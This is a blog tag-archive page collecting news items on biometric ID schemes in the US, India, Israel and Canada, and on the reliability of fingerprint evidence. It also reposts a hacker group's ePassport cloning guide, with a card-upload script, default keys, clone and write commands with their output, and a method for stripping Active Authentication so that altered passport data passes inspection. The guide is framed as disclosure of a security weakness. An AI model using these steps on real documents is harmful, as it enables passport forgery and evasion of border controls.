Posts Tagged ‘ Traceless Biometric ’

Immigration bill contains horrible biometric identities tracking database

May 16th, 2013 | By | Category: News

Submitted by sosadmin on Fri, 05/10/2013 – 13:34

We’ve been warning for some time about the stealth creation of federal databases containing the biometric identifiers of millions of people, as well as the federal government’s use of state registry of motor vehicle databases as pools from which to harvest driver ID photos at will.

But a proposal in the new bipartisan immigration bill makes even the FBI’s spooky Next Generation Identification database and its “Project Facemask” seem like 20th century card catalogues. Wired reports:

The immigration reform measure the Senate began debating yesterday would create a national biometric database of virtually every adult in the U.S., in what privacy groups fear could be the first step to a ubiquitous national identification system.

Buried in the more than 800 pages of the bipartisan legislation (.pdf) is language mandating the creation of the innocuously-named “photo tool,” a massive federal database administered by the Department of Homeland Security and containing names, ages, Social Security numbers and photographs of everyone in the country with a driver’s license or other state-issued photo ID.

Employers would be obliged to look up every new hire in the database to verify that they match their photo.

Sounds like an ambitious project that will likely cost a lot of money, and probably severely impact civil liberties.

But does face recognition even work? At present, not very well, even in highly controlled environments.

A Boston Globe report from 2011 found that face recognition software deployed at the Massachusetts Registry of Motor Vehicles misidentifies about 1,000 people per year, causing pretty substantial inconvenience for them. Multiply that figure by 50 and you’ve got a likely figure for misfires if such a system goes federal.

What’s the big deal, though? If the registry of motor vehicles denies you a license renewal for a couple weeks while you fix the errors, it’s a pain, though clearly not the worst thing in the world.

But what if the inconvenience became something much more serious? What if it meant you — or 50,000 other Americans each year — were denied employment and therefore lost your home to foreclosure, or fell behind on credit card bills and slumped into serious debt? Or worse, if the government started using this DHS biometric system for ‘security’ procedures, what if you were wrongfully arrested or even shot in a botched raid, a tragic case of mistaken identity?

In fact, advocates warn that, like the social security number, this tool could end up being used to track us in ways the creators of this supposedly ‘immigration-related’ system never intended.

Wired:

This piece of the Border Security, Economic Opportunity, and Immigration Modernization Act is aimed at curbing employment of undocumented immigrants. But privacy advocates fear the inevitable mission creep, ending with the proof of self being required at polling places, to rent a house, buy a gun, open a bank account, acquire credit, board a plane or even attend a sporting event or log on the internet. Think of it as a government version of Foursquare, with Big Brother cataloging every check-in.

“It starts to change the relationship between the citizen and state, you do have to get permission to do things,” said Chris Calabrese, a congressional lobbyist with the American Civil Liberties Union. “More fundamentally, it could be the start of keeping a record of all things.”

For now, the legislation allows the database to be used solely for employment purposes. But historically such limitations don’t last. The Social Security card, for example, was created to track your government retirement benefits. Now you need it to purchase health insurance.

An analyst at the Competitive Enterprise Institute told Wired that the proposed tracking system would be “like a national ID system without the card.”

No thanks.

The biometrics industry, meanwhile, is licking its chops. Analysts predict that the business will be worth $10 billion per year by 2018. The future beckons, and it’s looking more and more like Minority Report every day.



IS THERE A SCARY BIOMETRIC ‘NATIONAL ID SYSTEM’ TUCKED INTO THE IMMIGRATION BILL?

May 10th, 2013 | By | Category: News

May. 10, 2013 10:04am Liz Klimas

A more than 800-page bill for immigration reform, which the Senate has begun debating, carries a measure privacy advocates worry could lead to the creation of a biometric database of every adult in the United States.

The section in the Border Security, Economic Opportunity, and Immigration Modernization Act called “Identity Authentication Mechanism,” which describes a “photo tool,” is what has some on alert.

The section states that an employer hoping to hire an individual would need to verify the identity of the said person “using the photo tool.” Such a tool would be developed and maintained by the Secretary of State allowing employers to “match the photo on a covered identity document provided to the employer to a photo maintained by a U.S. Citizenship and Immigration Services database.”

Wired has the perspective of privacy advocates regarding this measure:

But privacy advocates fear the inevitable mission creep, ending with the proof of self being required at polling places, to rent a house, buy a gun, open a bank account, acquire credit, board a plane or even attend a sporting event or log on the internet. Think of it as a government version of Foursquare, with Big Brother cataloging every check-in.
“It starts to change the relationship between the citizen and state, you do have to get permission to do things,” said Chris Calabrese, a congressional lobbyist with the American Civil Liberties Union. “More fundamentally, it could be the start of keeping a record of all things.”

David Bier, an analyst with the Competitive Enterprise Institute, agrees with the ACLU’s fears.
“The most worrying aspect is that this creates a principle of permission basically to do certain activities and it can be used to restrict activities,” he said. “It’s like a national ID system without the card.”

This isn’t the first time this year the biometric data measure has been discussed. Back in January when the framework was endorsed by Senate Majority Leader Harry Reid (D-Nev.), those believing the system could infringe upon civil liberties began voicing their discontent as well.

Committee Chairman Sen. Patrick Leahy (D-VT) (C) confers with Sen. John Cornyn (R-TX) (L) during Senate Judiciary Committee’s markup for the immigration reform bill on Capitol Hill May 9, 2013 in Washington, DC. The 18 members of the committee have proposed in excess of 300 amendments to the 844 page piece of legislation that would, if passed, create a path to U.S. citizenship for undocumented immigrants. Also pictured is Sen. Jeff Sessions (R-AL) (R). (Photo: Win McNamee/Getty Images)

USA Today also reported earlier this week that an amendment was proposed by Sen. Orrin Hatch (R-Utah) that would require biometric data be collected on foreigners leaving the country, a measure Homeland Security tried rather unsuccessfully to institute as a program at airports since 9/11. The amendment would require such a biometric exit data system be established at 10 of the U.S.’s core airports within two years of enactment. After five years, a study on the effectiveness of the system would then allow the appropriate program to be instituted at all 30 airports flying internationally.

“Biometric data provides the government with certainty that travelers (and not just their travel documents) have or have not left the country,” Hatch’s office stated.

USA Today went on to explain that the reason the exit data system hasn’t taken off in the past is due to its expense.

Earlier this year, TheBlaze reported that the Pentagon was already working with a company to create a biometric scanning attachment for smartphones.



Obama administration moves forward with “Unique Internet ID” for all Americans

Jan 10th, 2011 | By | Category: News

The Obama administration is drafting a paper called the “National Strategy for Trusted Identities”, which investigates ways that web users can protect their online identities.

But Commerce Secretary Gary Locke was quick to reassure people that it wasn’t a guise for more big brother government.

Posted by Declan McCullagh (This story originally appeared on CNET)

STANFORD, Calif. – President Obama is planning to hand the U.S. Commerce Department authority over a forthcoming cybersecurity effort to create an Internet ID for Americans, a White House official said here today.

It’s “the absolute perfect spot in the U.S. government” to centralize efforts toward creating an “identity ecosystem” for the Internet, White House Cybersecurity Coordinator Howard Schmidt said.

That news, first reported by CNET, effectively pushes the department to the forefront of the issue, beating out other potential candidates including the National Security Agency and the Department of Homeland Security. The move also is likely to please privacy and civil liberties groups that have raised concerns in the past over the dual roles of police and intelligence agencies.

The announcement came at an event today at the Stanford Institute for Economic Policy Research, where U.S. Commerce Secretary Gary Locke and Schmidt spoke.

The Obama administration is currently drafting what it’s calling the National Strategy for Trusted Identities in Cyberspace, which Locke said will be released by the president in the next few months. (An early version was publicly released last summer.)

“We are not talking about a national ID card,” Locke said at the Stanford event. “We are not talking about a government-controlled system. What we are talking about is enhancing online security and privacy and reducing and perhaps even eliminating the need to memorize a dozen passwords, through creation and use of more trusted digital identities.”

The Commerce Department will be setting up a national program office to work on this project, Locke said.

Details about the “trusted identity” project are unusually scarce. Last year’s announcement referenced a possible forthcoming smart card or digital certificate that would prove that online users are who they say they are. These digital IDs would be offered to consumers by online vendors for financial transactions.

Schmidt stressed today that anonymity and pseudonymity will remain possible on the Internet. “I don’t have to get a credential if I don’t want to,” he said. There’s no chance that “a centralized database will emerge,” and “we need the private sector to lead the implementation of this,” he said.

Inter-agency rivalries to claim authority over cybersecurity have existed ever since many responsibilities were centralized in the Department of Homeland Security as part of its creation nine years ago. Three years ago, proposals were circulating in Washington to transfer authority to the secretive NSA, which is part of the U.S. Defense Department.

In March 2009, Rod Beckstrom, director of Homeland Security’s National Cybersecurity Center, resigned through a letter that gave a rare public glimpse into the competition for budgetary dollars and cybersecurity authority. Beckstrom said at the time that the NSA “effectively controls DHS cyber efforts through detailees, technology insertions,” and has proposed moving some functions to the agency’s Fort Meade, Md., headquarters.



Bangalore’s IISc students slam unique ID scheme Aadhaar

Jan 8th, 2011 | By | Category: News

Published: Saturday, Jan 8, 2011, 10:14 IST
By Hemanth CS | Place: Bangalore | Agency: DNA


A group of students and activists staged a silent protest on Friday opposing the 12-digit Aadhaar number as Unique Identification Authority of India (UIDAI) chairman Nandan Nilekani delivered a lecture on Aadhaar’s role in the transformation of public service delivery. Students from the Indian Institute of Science and activists held placards and banners saying ‘Beware, Big Brother is watching you’ and ‘Secure electronic archive is a myth’ at the JRD Tata Auditorium of the National Institute of Advanced Studies.

The protesters also distributed hand-outs and newspaper articles opposing the Aadhaar number. A few protesters questioned Nilekani on the necessity of introducing the 12-digit number during the question and answer session which followed his hour-long lecture.

The protesters argued that Aadhaar was a violation of privacy and civil liberties of the people and it could be used for profiling individuals, especially from the minority community.

“During and after the 2002 Gujarat riots, Muslims were handpicked by the rioters and executed based on the data collected from the state identity card. The same thing could happen if Narendra Modi becomes the prime minister. Fundamentalists will use Aadhaar to identify minorities and kill them,” said Rajesh, an IISc student.

The protesters questioned Nilekani’s claim that Aadhaar was voluntary.

“A big myth is being propagated that Aadhaar is voluntary. UIDAI’s concept note stresses that enrollment will not be mandated. But there is a catch: benefits and services that are linked to the UID will ensure demand for the number,” said a protester.

They wondered whether the bio-metric technology adopted by UIDAI is capable of the task of de-duplication. The UIDAI has admitted that retaining biometric efficiency for a database of more than one billion people has not been adequately analysed and that the problem of fingerprint quality in India has not been studied in depth.

Replying to the allegations made on Aadhaar number, Nilekani said that in every country whenever there is an issue of national security, there is provision to access identity. In India, it would be no different.

“The government is thinking of providing national portability and looking at inclusive growth. In turn, it’s an opportunity for people to open bank accounts, have micro ATMs and mobile phones through the Aadhaar,” he said.

If Aadhaar number is made equal to the KYC (know-your-customer) for opening bank accounts, it would lead the way for financial inclusion. According to a survey, more than 80% of the population especially in the rural areas said that they wanted a bank account, he said.



Fingerprint identification evidence questioned by senior judge

Nov 24th, 2010 | By | Category: News

A senior judge has raised concerns over fingerprint evidence used in criminal trials, warning that it rests on “assumptions” that have never been scientifically proven.

By Richard Edwards, Crime Correspondent 8:00AM GMT 19 Nov 2010

Lord Justice Leveson, an appeal judge and chairman of the Sentencing Council, called into question the “century old” identification process, which he said was often considered “virtually unassailable” in tying a person to a crime.

The judge said that there have been “numerous” recent cases of innocent people being wrongly singled out by fingerprint evidence.

In a speech to the Forensic Science Society in London, he said the analysis of fingerprints by experts was “fundamentally subjective” and that it was therefore “inherently capable of misidentifications”.

Lord Justice Leveson called for new research to be carried out to ensure fingerprinting is “robust” and reliable.

“There is growing unease among fingerprint examiners and researchers that the century old fingerprint identification process rests on assumptions that have never been tested empirically,” he said.

Speaking about the use of expert evidence in court cases, the senior judge said it was vital to have a “methodology and a hypothesis that are capable of withstanding robust testing”.

“Arguably, as it currently stands, the science of fingerprint identification does not,” he added.

The judge is the most senior member of the judiciary to speak out about the concerns, which have been raised by experts and academics for the past few years.

However it is unlikely to lead to a series of convicted criminals appealing their cases because in most instances where fingerprints are now used in court, the evidence is corroborated by other forensic samples such as DNA testing.

However examples of failings include Brandon Mayfield, who in 2004 was wrongly linked to the Madrid train bombings by FBI fingerprint experts in the United States.

Shirley McKie, a Scottish police officer, was wrongly accused of having been at a murder scene in 1997 after a print supposedly matching hers was found near the body.

Criminal fingerprinting techniques were pioneered at Scotland Yard at the beginning of the 20th century. The first successful conviction using them was of Harry Jackson, a burglar who was jailed in 1902.

No two fingerprints are ever exactly alike in every detail – even two impressions recorded immediately after each other from the same hand.

It requires an expert examiner to determine whether a print taken from a crime scene and one taken from a subject are likely to have originated from the same finger.

Unlike other forensic fields, such as DNA analysis, which give a statistical probability of a match, fingerprint examiners traditionally testify that the evidence constitutes either a 100 per cent certain match or a 100 per cent exclusion.

Lord Justice Leveson said: “The language of certainty that examiners are forced to use hides a great deal of uncertainty, which greatly undermines the examiners’ legitimacy.”

A recent study found that experts do not always make the same judgment on whether a print matches a mark at a crime scene, when presented with the same evidence twice.

Six examiners in several countries were given eight sets of prints to compare on two different occasions, without knowing it was part of a study. They changed their decision in six cases and only two of the experts were consistent with their previous decision.

The research, carried out at Southampton University, found they were more likely to change their decision if given contextual information, such as “the suspect has confessed”, that conflicted with their previous judgment.



Big Brother: National Biometrics in Israel

Dec 30th, 2009 | By | Category: News

The Knesset has passed Israel’s Biometric Database Law, expected to provide the statutory basis for introduction of ‘smart’ identification documents for all Israelis.

Interior Ministry officials will be authorized to collect the Biometric data – fingerprints and facial contours – of all residents for the purpose of issuing identity cards, passports or other official documents.

As with similar identity regimes in Australia and elsewhere (eg the latest generation of Australian passports), those documents will feature a microprocessor (ie a chip similar to those used in some credit cards and perimeter access cards) that will contain data based on the individual’s fingerprints (two fingers) and facial geometry, eg a unique hash generated from an image of the person’s face rather than the image itself. Biometric and other information on the databases will be matched with registration information on national databases. That would permit an official to determine, for example, that the photo on an identity document corresponds to the bearer’s face but that the individual is using another name and therefore is engaging in an identity offence.

As yet I haven’t sighted the legislation. From media reports it appears that the government has mollified some critics through a statutory commitment to establish two discrete databases: one including the card-bearer’s name and the other featuring data from the individual’s fingerprints and the face. The databases will be established and maintained in two separate ministries and “will be linked by a code”. There seem to be no official statements about sharing data with the private sector.

The ‘splitting’ of initial plans for a central database was an addition to the draft legislation in November, promoted as a safety measure -

so that anyone managing to penetrate one data bank would have only part of the information and it would be meaningless without the information from the other data bank.

The Chair of the Knesset Science & Technology Committee claimed -

The protection provided for this data bank is among the best in the world. It is protected at a level of 11 on a scale of one to 10

… which sounds impressive but is arguably meaningless. (What’s an ‘11’ when the scale ends at ‘10’? The Bill’s sponsor subsequently explained that “if the databases of the Mossad, the Shin Bet and the Prime Minister’s Office are currently protected at a level of 10, then this one will be protected at a level of 11”.)

Debate about development of the new regime featured the usual claims. A government spokesperson claimed that “there are 350,000 people living in Israel with fraudulent documents including tens of thousands with forged passports” and that forgery of the ‘smart’ documents will be impossible.

One former police executive offered an exceptionalist argument, commenting that -

in a normal state that does not face the enemies we face, there is no need for such a system. But here we are in an intolerable situation, facing internal and external enemies. The ease with which current Israeli documents can be forged is an enormous problem.

[Identity documents] are so easily faked. For us, this is an existential issue. There are thousands of people walking around with fake IDs or with no IDs whatsoever. Some are criminals, and others are hostile elements. You would not believe how many suspects we have found who changed their identities to hide previous convictions. Many identities have also been stolen.

He noted that the danger of official misuse of information is present with existing databases.

Critics expressed concern that information will be leaked or misused, eg “Criminals could steal fingerprint information and use it to incriminate innocent people”. Likud Minister Michael Eitan indicated that -

Not only will the system threaten the privacy of all Israelis, but even worse, it will create an atmosphere in which everyone will feel their privacy is being invaded….

Eitan was not however planning to vote against the law. (???!!!)

Implementation of the law involves a two year trial period, during which participation in the biometric database/s will be voluntary. Three months prior to the end of trial, the government will formally re-assess the regime’s effectiveness, with the Prime Minister and Interior minister reporting to a special ministerial committee and to a Knesset committee. If the trial is deemed successful, Interior Ministry officials will be mandated to collect the biometric information without consent. The legislation allows some wriggle room: the Interior Minister will be empowered to extend the trial by an additional two years after provision of the reports, with a requirement that a ‘final decision’ must be made within four years after initiation of the databases.

Posted by Bruce Arnold at 2:03 PM


U.S. – Canada To Share Refugees’ Biometric Info

Nov 25th, 2009 | By | Category: Evidence

BEAT THE CHIP

BEATTHECHIP.ORG IS DEVOTED TO PRESERVING US CITIZENS FROM THE PROGRESS OF REAL ID LEGISLATIONS

WEDNESDAY, NOVEMBER 25, 2009

c/o CanWest News Washington
WASHINGTON — Seeking to enhance its efforts to crack down on fraudulent refugee claims, the Harper government on Tuesday announced it has struck a deal to share fingerprint information on asylum seekers with the United States.

Public Safety Minister Peter Van Loan made the announcement following a bilateral summit here with U.S. Homeland Security Secretary Janet Napolitano.

Under the protocol, the U.S. will join a biometric data-sharing initiative Canada had already launched last summer with the United Kingdom and Australia.

“Biometrics continue to be a powerful tool to prevent terrorists and criminals from crossing our shared border and preventing identity theft and asylum fraud,” Napolitano said at a news conference with Van Loan.

Canada’s privacy commissioner, Jennifer Stoddart, had expressed a series of concerns about the biometric data sharing when the plan was first announced in August. Stoddart’s office questioned Ottawa about the need to collect fingerprints and sought assurances the personal information gathered would not be used for secondary purposes.

“While we are still reviewing their response, on the surface of it, it appears they have addressed most of our concerns,” said Anne-Marie Hayden, a spokesperson for the privacy commissioner.

“They have advised us that under the protocol, biometric information will only be used for immigration and nationality issues. They have also told us that biometric matching information will only be one of many elements considered when assessing a file.”

The privacy commissioner’s office is still awaiting a response, however, on how Citizenship and Immigration Canada “plans to address our concerns about how refugees, a very vulnerable population, will be notified about the collection and use of their biometric information,” Hayden said.

Napolitano said the U.S. will dispatch its chief privacy officer to Ottawa in early December for discussions with Canadian officials. “As we share information, we are committed to protecting privacy and civil rights,” she said.

Immigration Minister Jason Kenney has argued biometric data sharing on refugee claimants dramatically increases the government’s ability to identify foreign nationals who try to hide their past when seeking to enter Canada.
His office says the agreement allows countries to check each other’s fingerprint databases but doesn’t give them unfettered access to the information.

“Previous trials show that biometric information sharing works,” Kenney said in a statement Tuesday. “The data sharing helps uncover details about refugee claimants such as identity, nationality, criminality, travel and immigration history, all of which can prove relevant to the claim.”

When Canada, the U.K. and Australia initially signed the agreement last summer, they sought to allay privacy concerns by agreeing no central database of fingerprints would be created.

The information-sharing pact is part of a broader government initiative to introduce biometrics into Canada’s immigration and refugee screening system — a plan that continues to raise red flags for privacy advocates.

“We have made them aware of our concerns with respect to what seems to be a general trend toward an increased collection of biometric information,” Hayden said.



How to create a backup of your own passport chip(s)

Nov 12th, 2009 | By | Category: Evidence

THC/vonJeek proudly presents an ePassport emulator. This emulator applet
allows you to create a backup of your own passport chip(s).


The government plans to use ePassports at Immigration and Border
Control. The information is electronically read from the Passport
and displayed to a Border Control Officer or used by an automated
setup. THC has discovered weaknesses in the system to (by)pass the
security checks. The detection of fake passport chips does not
work. Test setups do not raise alerts when a modified chip
is used. This enables an attacker to create a Passport with an
altered Picture, Name, DoB, Nationality and other credentials.

The manipulated information is displayed without any alarms going off.
The exploitation of this loophole is trivial and can be verified using
thc-epassport.

Regardless how good the intention of the government might have been, the
facts are that tested implementations of the ePassports Inspection System
are not secure.

ePassports give us a false sense of security: We are made to believe
that they make us more secure. I'm afraid that's not true: current
ePassport implementations don't add security at all.

Thanks to Elv1s for beta testing!

Just follow two easy steps:

(1) Upload the emulator code to a blank JCOP v4.1 72k smart card
Use your favorite tool to upload the CAP file. As an example GPShell is
used. The script used to upload the CAP file:

P:\GPShell-1.4.2>type epassport.script
mode_211
enable_trace
establish_context
// edit the following line to match your PCSC reader
card_connect -readerNumber 3
select -AID A000000003000000
open_sc -security 3 -mac_key 404142434445464748494A4B4C4D4E4F -enc_key 404142434445464748494A4B4C4D4E4F -kek_key 404142434445464748494A4B4C4D4E4F
delete -AID A00000024710
install -file epassport.cap -priv 2
card_disconnect
release_context

A sample output of an actual upload:

P:\GPShell-1.4.2>GPShell.exe epassport.script
mode_211
enable_trace
establish_context
card_connect -readerNumber 3
* reader name OMNIKEY CardMan 5x21-CL 0
select -AID a000000003000000
Command --> 00A4040008A000000003000000
Wrapped command --> 00A4040008A000000003000000
Response <-- 6F108408A000000003000000A5049F6501FF9000
..
..
..
Wrapped command --> 84E60C002506A0000002471007A000000247100107A00000024710010100
02C90000B918E8E43A25117700
Response <-- 9000
card_disconnect
release_context

The CAP file currently supports the following files:

 * EF.COM :    32 bytes (required file)
 * EF.SOD :  2560 bytes (required file)
 * EF.DG1 :    96 bytes (required file)
 * EF.DG2 : 24576 bytes (required file)
 * EF.DG11:    64 bytes (optional, e.g. USA)
 * EF.DG12:    96 bytes (optional, e.g. USA)
 * EF.DG13:    96 bytes (optional, e.g. Japan, France)
 * EF.DG15:   192 bytes (optional, e.g. The Netherlands)

If you need support for other / larger DGs, please let vonJeek know.

(2a) Clone the chip
Using a customized THC version of Adam Laurie's RFIDIOt tools, you're able
to read a chip's content and to write it to an emulator.

P:\RFIDIOt-vonjeek>mrp0wn.py CLONE M3V0NJ33K000000999999

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek <mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Put a ePassport near the terminal and press enter to continue...
Reading document using KEY M3V0NJ33K000000999999, please be patient...
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.

Done, happy mrp0wning :) 

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

If your chip is protected using the optional Active Authentication mechanism,
the Active Authentication data group (DG15, tag 0x6F) is removed from EF.COM
as demonstrated by Jeroen van Beek at the 2008 USA BlackHat Briefings. Note
that mrp0wn.py's parameter 'STRIP_AA' must be set to the value 'True'. This
attack will work on all inspection system implementations that are using e.g.
ICAO's "worked examples", see this site for more info on that.

(2b) Write saved data
It's also possible to write chip data you've saved earlier using RFIDIOt's
mrpkey.py. As an example you can use vonJeek's ePassport data. Note that
this data is self-signed: vonJeek started his own country :-D 

P:\tmp>unzip vonjeek-epassport_dump.zip
Archive:  vonjeek-epassport_dump.zip
 extracting: EF_COM.BIN
  inflating: EF_DG2.BIN
  inflating: EF_DG1.BIN
 extracting: EF_SOD.BIN 

P:\>cd \RFIDIOt-vonjeek 

P:\RFIDIOt-vonjeek>mrp0wn.py WRITE /tmp

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek <mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Document type is PASSPORT.
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.
Done, happy mrp0wning ;) 

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

You can also alter data before writing it to an emulator chip. If you want
to do that: this document contains details about - amongst others - DG1 and
DG2 encoding. If you've updated the DGs you can sign them using Peter
Gutmann's CryptLib. 

A read-out of vonJeek's ePassport chip using the reference implementation
named Golden Reader Tool can be seen below.

vonJeek's passport

If you're interested in ePassport related PKI (how to verify whether chip
content is signed by a bona fide authority?) please check the following URLs:

* http://www2.icao.int/en/MRTD/Pages/icaoPKD.aspx
* http://www.icao.int/icao/en/atb/meetings/2008/TagMRTD18/TagMrtd18_ip04.pdf
* http://www.csca-si.gov.si/TR-PKI_mrtds_ICC_read-only_access_v1_1.pdf
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467106.ece
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467098.ece 

Yours sincerely,

vonjeek [at] thc dot org
The Hackers Choice

http://www.thc.org


India working on standard for biometrics

Sep 26th, 2009 | By | Category: News

By Swati Prasad, ZDNet Asia – Friday, September 25, 2009 04:59 PM

NEW DELHI–The need for standards and concerns over security and privacy were highlighted this week, as the Indian government prepares to roll out various e-government projects based on biometrics.

“The industry, government and academia need to collaborate to evolve standards for biometrics,” Nandita Jain Mahajan, IBM’s India South chief privacy and information security officer, said during the India Preparatory Meeting: Biometrics and Data Protection, held here Thursday. The two-day event was organized by the Data Security Council of India, a self-regulatory organization led by Nasscom.
According to Mahajan, the Indian government should adopt open standards to avoid heavy dependence on one technology vendor.
The country is in the process of deploying biometric cards for various e-government schemes, including the national unique identity card and e-passport projects.
“No government wants to be locked into any one technology,” S. K. Sinha, senior director of National Informatics Centre (NIC), said during a panel discussion, adding that India has put much emphasis on standardization for the technology.
“The Indian government is working on a national standard for biometrics [and] wants to have a technology standard that is open and provides a level-playing field so that many vendors can take part,” Sinha said. However, he noted that standards should be established such that they can be widely adopted by the industry. “Standards should be implementable,” he said.

Are biometric cards privacy-compatible?
Shree Parthasarthy, a director at Deloitte, said biometrics is “as old as forensics”, taking into account several factors such as the iris scan, finger prints, appearance, social behavior, skull measurement, voice, and so on. “It’s impossible to replicate or mimic all of these characteristics,” Parthasarthy noted.
And while biometric cards offer better security, he noted that there are several primary concerns over the use of such cards, including questions about privacy protection, misuse of biometric data and how biometrics will support privacy policies.
According to Mahajan, there are three technology components in biometrics: acquisition, extraction and matcher. Often, all attributes of biometric cards do not match and the acceptability error rates can be high, he said.
“If your password is compromised, you can change it, but if your biometrics is compromised, what can you do about it,” he questioned.
Y. D. Wadaskar, managing director of Pune-based IT security products company, WYSE Biometrics Systems, said: “Every individual is unique and therefore, biometrics and privacy go hand in hand. We need to trust these cards just as we trust our doctors and lawyers when we share personal information with them.”
Sunil Dhaka, chief information security officer of ICICI Bank, said the bank has been successful in implementing biometric cards for agriculture-based banking in rural areas.
“Since rural India has no Internet or tele-banking facility, we realized the solution had to be online-offline ready,” Dhaka said. “With such cards, we can do banking at the speed of thought.”

One billion ID cards challenge
Zia Saquib, executive director of Centre for Development of Advanced Computing (C-DAC), who also attended the meet, noted that deploying biometric cards for citizens in New York is different from implementing similar schemes in rural India. C-DAC develops applications for e-government projects.
According to Saquib, data collection and enrolment in rural areas can prove a challenge as “identification is a sensitive issue”.
“We need to have strong authentication processes in place at the time of enrolment,” he explained, adding that biometric data must not be stored in the same place as personal data.
“Biometric data must be stored locally,” he said. Saquib also highlighted the benefits of using digital rights management methodology for biometrics, giving users access to information only on a “need to know” basis.
Sinha said generating over 1 billion national unique ID cards cannot be done with a small number of stakeholders. “You need different stakeholders for enrolment, creation of database, generating algorithms, verifying and distributing these cards,” he added.
“And when you have so many stakeholders, the need for standards becomes all the more critical,” he noted. Asked how the government plans to address privacy and security concerns over biometric cards, he said it is still too early to provide comments.
Sinha said: “All we can say is that the data will be highly protected and we will put several cyber-controls and encryptions in place, in both online and offline mode.”
Swati Prasad is a freelance IT writer based in India.